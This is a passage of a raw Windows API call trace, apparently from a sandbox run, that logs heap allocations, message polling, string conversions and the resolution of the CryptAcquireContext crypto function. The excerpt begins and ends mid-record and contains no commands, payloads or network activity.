HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0211.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0211.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0211.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0211.308] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0211.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.309] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0211.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0211.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.311] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.311] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.312] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0211.312] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0211.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0211.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0211.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0211.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0211.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0211.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0211.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0211.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0211.428] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0211.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0211.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0211.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 